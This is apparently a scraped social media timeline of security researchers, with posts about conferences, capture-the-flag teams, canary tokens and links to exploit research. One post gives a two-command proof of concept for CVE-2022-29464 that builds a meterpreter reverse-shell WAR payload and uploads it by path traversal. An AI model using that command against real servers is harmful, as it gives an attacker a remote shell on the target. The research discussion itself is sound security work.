antic0de

So ends an era of the New Zealand scene that lasted well over a decade. Shout outs to all of the people who worked to contribute to this epic period of history. Congrats of course to those founders and owners that made it through to this point. Waiting now for the next wave.

The first 15 minutes of this weeks @riskybusiness is why we build @ThinkstCanary (and why it works). - Attackers know there’s value in arb file shares; - Attackers know there are creds in random text files. Canaries && Canarytokens let defenders know when they are being touched

The Aruba AP CLI support password calculation script from my #defcon30 presentation is available here: github.com/dozernz/bugstr…

@wdormann We have never talked directly, but I’ve always followed your work and been impressed how much knowledge you had across such a wide field

Can you bypass authentication by exploiting a vulnerability? 10$ for first solver! 💢🔥 octagon.net/chal/3.php

Congrats to our team members selected to join Team Oceania at the inaugural International #Cybersecurity Challenge CyberCX is proud to sponsor Team Oceania in the competition, which will be held in Athens, Greece from 14-17 June Find out more here: austiccquals.uqcloud.net

@daveaitel Ahh the good old days eh @nicowaisman @basalberts @crypt0ad etc

"you don't hack any more. You've never even hacked." -16yo

From a VR student today on our ROP chain lessons. I'm dying 😂: "This week's been like"

CVE-2022-29464 PoC for this in two commands... 1. msfvenom -p java/meterpreter/reverse_tcp -f war lhost=192.168.0.6 | curl -kv https://192.168.0.6:9443/fileupload/toolsAny -F ../../../../repository/deployment/server/webapps/x.war=@- 2. curl -kv https://192.168.0.6:9443/x :/

My offensivecon 2022 keynote “rules to hack by” is now available on video at the link below

If you are using JWT+Java+EC, you should probably grep your logs for MAYCAQACAQA

I have been playing with KernelCallbackTable process injection lately and here's something I wanted to share. #redteam #maldev #infosec captmeelo.com/redteam/maldev…

Launch Update: Kawaiicon 2 are continuing to target July 1-2 2022 for launch. ✨Wave 1 of ticket sales to open midday Friday.✨ This is not a drill! What will Kawaiicon 2 look like this year? SO GLAD YOU ASKED.

A few people commented that it was annoying having to login to SlideShare to d/l, so I've made them available on github here: github.com/mdowd79/presen…

12 ROP chains later - from CVE-2019-0567 crash POC to code execution. ASLR, DEP, & CFG bypass + ACG bypass using (since-patched) CVE-2017-8637 to abuse the way Chakra-based Edge handled (pun intended) supplying a handle from the out-of-process JIT server to a content process.

Thrilled to share my new blog post: Put an io_uring on it: Exploiting the Linux kernel. Follow me while I learn a new kernel subsystem + its attack surface, find an 0day, build an exploit, + come up with some new tricks. I go deep and demystify the process graplsecurity.com/post/iou-ring-…

Guys & girls! Exactly a year ago I promised over 15 bugs in win32k. You're welcome to read and find out about my biggest research so far: #win32k #SmashTheRef bug class - github.com/gdabah/win32k-… Check out the paper and the POCs, there are some crazy stuff going on. Promise!

We are pleased to announce tmp.0ut Volume 2 tmpout.sh/2/

Ever wanted to debug your microcontroller over USB-C? (I'm talking JTAG/SWD, not just USB!) If you already have a USB-C connector, there's no need to have an additional connector to program (or tag-connect pads, which are super nice) Here's one way to do it: 🧵